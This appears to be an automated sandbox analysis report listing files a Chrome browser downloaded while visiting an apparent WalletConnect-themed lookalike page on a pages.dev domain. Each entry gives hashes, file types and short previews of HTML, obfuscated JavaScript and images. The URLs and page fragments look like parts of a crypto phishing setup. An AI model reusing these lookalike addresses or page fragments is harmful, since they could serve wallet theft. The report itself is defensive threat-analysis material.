                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2982
                                                                                                                                                                                                                                              Entropy (8bit):7.888964750552628
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:88Ce/V+fV/ffKLDQmnTbWfcgfFkMCWw60xCnQwLi+QGME4h/pgGJAtYxe+2SELA/:88CQVC/fqcmOfcedVw67Q2zQy4DPy+r5
                                                                                                                                                                                                                                              MD5:D0BFD7EEFC33F692B10B2D342A0F715F
                                                                                                                                                                                                                                              SHA1:79165067305A206B1713BE7DC0D6DCF915153DEA
                                                                                                                                                                                                                                              SHA-256:DBC925830CBE966BAD72C492EE6B7A591EF8E54C00E9FBC95FA729B27415F2F8
                                                                                                                                                                                                                                              SHA-512:608937306F030833BFD3E3AEC4B6F26D9298DC04DBD0E79189853FF2F982E2C8B5B05CD4B4F717E834F46C73984250754DBB0C5CAAB2A492AF3ED805FF6581B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 .....R...*....>I$.F".!!#..P..gn.wN....i...]{...7.K~....'...zk...~..............}.?L...m..........?....z...c.;..............i..?........[.....{.....?.tm.~I...c.W.....w..n.0.5.E.O.O..d..A-\.....?j......?j......?j......?j......?j......?j......?j......?j......?j......?j.........y.......7..(M....[..Y.Vw",.nd&....!.`r.4.[<.-....+.].Vy..`...fTl..&[.{`...=I..^.'........o.0.Y........./.-&....G..]...S.Q.........3sP.V..,>W...g.Y.$...........P...G.LO3#)..A......&.T..d..?.KJ.3L.F...p..Q..&...$).3w.%v...2|.......4...xz.8....]....d..m...d.FJf.+..Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y.V~..g.Y. .....r....x}.A..<....Z.........+*y...J......=.k4.>wp..7zO.........%Q+@..$.&.zd...k,.....0H....L.C$`^.....u.4...E4.....JI..f.t....2..~8[..3b9..$jz.....-.g....b..%.Xz....:H6d.J../(..KM......P.!.....\.........7O`....6...N.3..*..O-)......E. .e.....s|....<..xQ_f.[..X.$....7a..t..>..lt.v.^.cI."L....M0.d
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):38504
                                                                                                                                                                                                                                              Entropy (8bit):7.993190208107606
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:qmMeABqCXa/n/JnyYu4MY7kAgEs0cgCQsazH1o0rYQ24RvCqGPLpkqcD/:qRopHJHRkAgEeTa/24RWvcD/
                                                                                                                                                                                                                                              MD5:30B4D215F07A5E35970D5E5339C7EF19
                                                                                                                                                                                                                                              SHA1:0BDCBEB5773F312D9F77AE7C5FFDF0480EC1600B
                                                                                                                                                                                                                                              SHA-256:E7D9A485DE9F384887A4384B8E4610E39DEFE58F84CED212BD4C6310264C77EF
                                                                                                                                                                                                                                              SHA-512:AA98708FA1AE48E480302A92320C87A6F11A7CE3AD036C047340A0FC5C2913FFB526BFF210BBE6EBAE40081EBD7C3C3F2376EFEBAEE524CCDA1D8BEBB13A5156
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/logo-BjYZztWT.png
                                                                                                                                                                                                                                              Preview:RIFF`...WEBPVP8LT.../.Aw......./f..L.....w..3W&....$)..jz.i....iwZ033.u...`.F2.1....o....c..J......d.OZw.....#P.3...0............RCi.,~.3..&.Em..4.!.b..).8...-8Y%a.P..#."D..L&PB..4*..@.Ia.M...D....A....l.4.&..5IX..`.'..J...d.@.I<N$!.%.D..D.E..g...g.K.?...a.....a.Lj.. .b...2./d.`.3..M(....|K......*..s.....d...@,f.)D.....?.>......~.&.+...5..pDe....^f... .i...u8\.nI.HQb.F....?.i6 Fi.."...S..A.1Gd9P1......4H~..^.P..4.8..........]..2hG....:..H.*.N....7..gS.....oj.3.f...|=..t.s.hK.....W.6..8^9...*qz...p:.x..y..u.?..KP..2q.j.\R?......$p|.=v..;..K...D..2V.s..c.V.F......?...ZS..O..W...Sw..y.=4....-...'6l.......,.........Ot..l_.l...[...~e....ry.y....BU.+...p.|7.^}...8..t..........).A.6.....z..!"&......6..s.!..[@.....&Z.<.x.#..l2.ef.$..<6.;..........Epm.lk...#A"...q7.`KU.n...X.......X%.........&d..S.$9n$..@!....vR.......y.Vr.K.[%Q<v&.....X....{o..'n}F......H.. R...[...,.o....E...y....{..O.Z....D...mK.$I.....G@@D.s.i`.ae......j..A.n..c..AB.<rN..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (31748)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):41955
                                                                                                                                                                                                                                              Entropy (8bit):5.573275018815817
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Q7t55W+8+8ToOWc+xbO5ViQzYxKd/wnDw9GD60+LSiD8GXSkckbzLAGkHqLyMe04:S5s+fx6iQ8xKpej60+LSytbEM2owf
                                                                                                                                                                                                                                              MD5:1C7710E820F0FD35E1A783191848C2F3
                                                                                                                                                                                                                                              SHA1:C64AEF70542818F60DA20B56F6404DF035ECA1B5
                                                                                                                                                                                                                                              SHA-256:48C09911B218C369F0E8A4AEE59B697C81467ECF0427B9E14A29D204EB7256CD
                                                                                                                                                                                                                                              SHA-512:E57B3661E432A23F7F58F5DD8DC918AF80DA7E47B2EC9DD87365531E9EA5E64A103FE13609D44510A81DAB884C0FE0256DABAE9BA7BFDD38A05C1031E69CFAA7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var Rt=Object.defineProperty,At=Object.defineProperties;var Et=Object.getOwnPropertyDescriptors;var at=Object.getOwnPropertySymbols;var Nt=Object.prototype.hasOwnProperty,Bt=Object.prototype.propertyIsEnumerable;var it=(s,e,r)=>e in s?Rt(s,e,{enumerable:!0,configurable:!0,writable:!0,value:r}):s[e]=r,ke=(s,e)=>{for(var r in e||(e={}))Nt.call(e,r)&&it(s,r,e[r]);if(at)for(var r of at(e))Bt.call(e,r)&&it(s,r,e[r]);return s},De=(s,e)=>At(s,Et(e));var lt=(s,e,r)=>new Promise((t,n)=>{var i=b=>{try{d(r.next(b))}catch(o){n(o)}},v=b=>{try{d(r.throw(b))}catch(o){n(o)}},d=b=>b.done?t(b.value):Promise.resolve(b.value).then(i,v);d((r=r.apply(s,e)).next())});import{c as _,i as S,t as k,j as Xe,b as Qe,e as z,s as I,u as te,d as Fe,g as Ke,a as U,k as ft,m as Ft}from"./web-13cf6287.js";import{p as Se,P as ht,_ as Pt,c as N,B as fe,I as bt,A as Dt,b as Ot,t as Vt,h as Ue,e as le,a as Ut,V as Jt,s as _t,k as Je,w as qt,T as Ee,$ as Oe,D as Gt,u as vt,g as Ht}from"./manifest-51a3674f.js";import{i as Wt,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (27094)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):27151
                                                                                                                                                                                                                                              Entropy (8bit):4.9157447814907345
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:mkB/tbe7BMMs68g7/nHXSUdP3J7KKukjIL/+MKWXr569T6NvLtOyXovIyj5/mjKy:PO2Rd69T/Iyj583J
                                                                                                                                                                                                                                              MD5:AA0A5F7A6A6FFADF2208D89C8938623E
                                                                                                                                                                                                                                              SHA1:F7D984F38A12904756F6426D14712FB25D7EC101
                                                                                                                                                                                                                                              SHA-256:A724179382C3248F0C2EB2B00C22E48B8347198457AFD7300F372B977BE62589
                                                                                                                                                                                                                                              SHA-512:C77A22BD53C3CB1E51B1C0C41A1BABA7D25AA7F8B1D2778A6718DE5D1B99D7A286323896834AD057E364532242753FC9AD3C3E841AD0D4BB6A9036F1C58C59B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const e="Action",o="Add",t="Affiliate",i="BRONZE",a="Bet",n="Buy",r="Cancel",s="Card",c="Change",l="Completed",u="Confirm",d="Copy",h="Currency",y="DIAMOND",m="Deposit",f="Details",g="Device",p="Disable",w="Duration",v="Edit",b="Email",P="Enable",S="Feedback",_="GOLD",T="Global",V="History",C="Language",A="Location",E="Marketing",I="Medals",k="Medium",R="NFTs",N="Notification",Y="OK",D="Online",O="PLATINUM",F="Passed",L="Password",M="Paste",G="Permanent",W="Position",U="Preferences",H="Prize",B="Profile",x="Quantity",q="Remove",K="Resend",z="Rewards",J="Rollover",j="SILVER",Q="Save",Z="Search",X="Security",$="Sessions",ee="Statistics",oe="Status",te="Strong",ie="Submit",ae="Success",ne="Swap",re="TIP",se="Talkative",ce="Telegram",le="Theme",ue="Transaction",de="Unlimited",he="Username",ye="VIP",me="Verified",fe="Verify",ge="Wagered",pe="Weak",we="Win",ve="Withdraw",be="month",Pe="success",Se={"1. Check if your phone bill is overdue.":"1. Check if your phone bill is overdue.","2. Check
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4257
                                                                                                                                                                                                                                              Entropy (8bit):7.926285814832465
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:C9fPBM06wsTSUlWlwFUqhOzLC1603v/uVcx2oRlTRuwk:mfeR1GUlWlwFwLeHuq1zTRjk
                                                                                                                                                                                                                                              MD5:4158BBBDF7C102C5D95D82E64338384B
                                                                                                                                                                                                                                              SHA1:53BB8C7676730A43FB28DD5BCB95DEEE421C66E0
                                                                                                                                                                                                                                              SHA-256:0AFD99D1B0790CEF5BC89490B5852434A970A169A20CEB8AAF8E8D652AE58D98
                                                                                                                                                                                                                                              SHA-512:487E01E91B6001E35F98ED0D451D01FFD0867A719BEAB9334FE0D6478208FC4416AC003C3F75C8BE7B24AE014779018DC90904F5DAB7CF6D45774D661B452410
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTE..M7^J%T;.M..E.M.E.../.......?....;..3.............:.?.T.K....D..d....J.....P.I0Z...V......../..J.5....../..6..+....,..<...........8....>.}..0...W@g.\..p....mSv...................}..?.{_....C....tY{.....R<b^Gl...S..y.fLq...}......4....S*[.....]............e......j......N..v....m..........zF..\......d..t......m;y.t.........7..[..R.......A'Y.....s....j..e....d..G...]0c....[0n....\........}..>.......z.....p..]...............H..>......Q......k.I [.o..w.f5opB.S)f.....z...^..h...S5dK(a....^;g......S..~....S.......m.`=u.......zS..\..l.......p.........kIw.w..i.....]..|..m.............gAoqN.......f..~......|.}............q..x...r........Iy....OIDAThC..{\......[..*8.(....y..I.xI.RALY.0.F2..P..qM."..i.)..-.....9......MK.K...Zm...|o..w9..zy8.y..w...1~E..C.hh.......'..$.......`..3..i.%..l.6n.i(...E.3..*.......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1949)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1950
                                                                                                                                                                                                                                              Entropy (8bit):5.336245913714392
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:xCUBk9D9EWdxFMwsHPNJWHbjyLqjSTyKeFyBpSMAmSAUc54fQ5XxdJXQs04f+Kyx:ZkTRDMweEjRIPYmSCi4BBf+B+0Fh
                                                                                                                                                                                                                                              MD5:6280CD50F7F5CF60A37E6BEC70B08E27
                                                                                                                                                                                                                                              SHA1:C9D2376E7FCBE95130B0707AB0C22B3C67A12001
                                                                                                                                                                                                                                              SHA-256:58A5A8C7917A7196C7408CEEA2024ED23D2C6C997E02C3C8E32E12744392318F
                                                                                                                                                                                                                                              SHA-512:A0FC4F9C178DB99251E1DDB249C3E689B2D08457A976D7689C4EB13554FB865ED99050B0CE4040C922E36B42709D897AE08F0497A0BD880165C54842C8E58C7F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{c as F,j as x,b as p,i as T,t as d}from"./web-13cf6287.js";import{h as v,c as I,e as g,a as c,k as S,D as f,$ as m,s as U}from"./manifest-51a3674f.js";import{n as P,m as _,c as A,E as k,p as w}from"./solid-js-38561dfe.js";import{b as D}from"./_baseGetTag-c2e287b9.js";import{a as E}from"./isArray-79a0be9c.js";var j="[object Boolean]";function B(e){return e===!0||e===!1||E(e)&&D(e)==j}var b=d("<span>"),z=d("<img>");const N=P(),i=()=>{const e=w(N);if(!e)throw Error("Can not used CurrencyFormat outside of CurrencyFormat component");return e},l=e=>{const r=_({currencyName:"USDFIAT"},e),n=()=>r.toCurrency?B(r.toCurrency)?v.setting.localeCurrencyName:r.toCurrency:r.currencyName;return F(N.Provider,{value:{currencyName:()=>r.currencyName,toCurrency:n},get children(){return r.children}})},Z=e=>(()=>{var r=b();return x(r,p(e,{get class(){return I("inline-flex items-center gap-x-1",e.class)}}),!1,!1),r})(),G=e=>{const r=i(),n=()=>S.coinIcon(e.forceToCurrency||r.toCurrency());return(()=>{va
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):29512
                                                                                                                                                                                                                                              Entropy (8bit):7.9915444917827525
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:zMwHT3RkJjwuG4XaI/0TD/qZfC1GxdWjlQoi6Yx:z9zRkNw2XabTOZa1pY5x
                                                                                                                                                                                                                                              MD5:3EC3B45D551480D3E6ACC4E177E3204D
                                                                                                                                                                                                                                              SHA1:B6077489F190DB241A5C206A914F93638A39D81F
                                                                                                                                                                                                                                              SHA-256:5B0AFB174E3D01998DE152A23F387C692F21DF5663E3CECED8DF8646869D140E
                                                                                                                                                                                                                                              SHA-512:53E3E5D0B09170B87A7C5522B62AA0AEEA6462638E8683ECBEE05569DC1EF67B7ED6926EFA7D5082A1ABA192877F5805ABA161737DE4C7A19023F90EED85A46C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/casino-sigma-europe-2023-kqUuEyFe.png
                                                                                                                                                                                                                                              Preview:RIFF@s..WEBPVP8L4s../.A=...*.$Y..y.....#.....!.$GQu..q.........6.H..+.........4l.`.I.4k.m......}...m.n&m..r.....%2..8P..[E.[.!.... a..%......2../`..$........i.....Txa....?.0....wK..x4.B....D.....PU...o./.A..A.V.....P..^....e...X.......h..Ns|.;.E.~.......y.+q.s]:_....S...q.I....fDM..MhF).:....C.t....Tn.\..*.....qn..X.$:.]..O...=..bYx.mj..$.u"$QH..T.Q..I.Z-...-.""!....W..MG.E.MD;..."..^.<.N3..2.... ..V........P..._7......k.@..I...|.v..n.k...[.....~|...w.q....?.GM.4f.>*..}..z7.m.hP...f..$/j..>.fa.3.@..H..a/Q..;V...6n......IHW..,@#.D\.a.#. ....z....o..5..)z..*GA.6L.........$.].M......Q..ww........v.]kmt...}..>...I.Dp..A..(4..N\.-.~..=.X.7X!... ..........D.....9.$G.d....z&;.E.(..02j......dk...ME.|.......m7n#.....P=<<0...tlm..F..l.$.(.&5.[...t.%`.Q.M.H..X........k{.../.^UD.%J.\......<....{.......6.m=......bz#.e..q.........r.8-2$SM.....]"`.KEw.z.I...................V.C..rs...v.5.^..Z?.HJ..Kbr..X.@...a%.I.y.Z.J...O..Ao.E...d.uk......c>z....._..8OO#.4..@.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):271815
                                                                                                                                                                                                                                              Entropy (8bit):5.327558274572759
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:SLaTmIQ+J4AHqBC2IWXfs4XogoYrH7ZTTpOYsAOA8G6TAB4l7N3jQ3BDG8G65yKp:SUQ+J4AKBCOfsW3H7ZTQnCbg72ifwsw7
                                                                                                                                                                                                                                              MD5:9DE3C76658BEEDEDA159A01498C6353C
                                                                                                                                                                                                                                              SHA1:94DC4B133E88421692C7115B8BE766AF066719B1
                                                                                                                                                                                                                                              SHA-256:2102A1367596149DBFCA660B8F823C48C87E4956F938EF8F7D6E15E6C9496C9B
                                                                                                                                                                                                                                              SHA-512:41CC0A8D24CBAA270181653B4C525A7BC911B81FD7775A21F60A4F42F0D34BCDB9E0E00D30CC3B45D9584B106022B06FC48FED14E680A58FA73573E098418A5D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/js/fp.min.js
                                                                                                                                                                                                                                              Preview:!function(_0x610598){var _0x138797=(function(){var _0x4c01e2=!![];return function(_0x22933d,_0x3af5ad){var _0x5a5850=_0x4c01e2?function(){if(_0x3af5ad){var _0x287b9a=_0x3af5ad['apply'](_0x22933d,arguments);return _0x3af5ad=null,_0x287b9a;}}:function(){};return _0x4c01e2=![],_0x5a5850;};}()),_0x1c3625={};function _0x2127fd(_0x37b3ba){var _0x502a5c=_0x138797(this,function(){return _0x502a5c['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x502a5c)['search']('(((.+)+)+)+$');});_0x502a5c();if(_0x1c3625[_0x37b3ba])return _0x1c3625[_0x37b3ba]['exports'];var _0x1fde67=_0x1c3625[_0x37b3ba]={'i':_0x37b3ba,'l':!0x1,'exports':{}};return _0x610598[_0x37b3ba]['call'](_0x1fde67['exports'],_0x1fde67,_0x1fde67['exports'],_0x2127fd),_0x1fde67['l']=!0x0,_0x1fde67['exports'];}_0x2127fd['m']=_0x610598,_0x2127fd['c']=_0x1c3625,_0x2127fd['d']=function(_0x59a2f9,_0x391ef2,_0x16f37c){_0x2127fd['o'](_0x59a2f9,_0x391ef2)||Object['defineProperty'](_0x59a2f9,_0x391ef2,{'enumerable':!0x0,'get
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/z0emk-akw98-t47wk.js
